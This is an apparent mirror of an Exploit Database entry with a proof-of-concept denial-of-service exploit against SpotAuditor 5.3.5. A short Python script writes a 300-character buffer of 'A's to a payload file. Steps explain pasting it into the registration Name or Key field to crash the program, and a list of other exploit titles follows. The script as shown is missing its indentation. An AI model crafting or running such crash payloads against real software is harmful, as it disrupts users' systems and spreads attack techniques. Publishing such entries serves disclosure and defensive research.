SpotAuditor 5.3.5 – ‘multiple’ Denial Of Service (PoC)

Exploit Database
22 阅读

作者： Sinem Şahin

日期： 2021-02-24
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/49589/

# Exploit Title: SpotAuditor 5.3.5- 'multiple' Denial Of Service (PoC)
# Exploit Author : Sinem Şahin
# Exploit Date: 2021-02-10
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
# Tested on: Windows 7 x64
# Version: 5.3.5


# Steps: 
 1- Run the python script. (exploit.py)
 2- Open payload.txt and copy content to clipboard.
 3- Run 'SpotAuditor 5.3.5'.
 4- Register -> Enter Registration Code
 5- Paste clipboard into the "Name" or "Key".
 6- Click on OK.
 7- Crashed.

---> exploit.py <--

#!/usr/bin/env python
buffer = "\x41" * 300

try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print"File okey!!"
except:
print "File is not created."

last Exploits
SpotAuditor 5.3.5 – ‘multiple’ Denial Of Service (PoC)的更多信息

Base64 Decoder 1.1.2 – Overwrite (SEH) (PoC)：
Winamp 5.63 – Invalid Pointer Dereference：
Remote Help HTTP 0.0.7 – GET Format String Denial of Service：
WebKit – ‘WebCore::InputType::element’ Use-After-Free (2)：
VideoLAN VLC Media Player 2.0.3 – ‘.png’ ReadAV Crash (PoC)：
WordPress Plugin WPGraphQL 1.3.5 – Denial of Service：
Adobe Flash – ‘.MP4’ Stack Corruption：
FileZilla 3.40.0 – ‘Local search’ / ‘Local site’ Denial of Service (PoC)：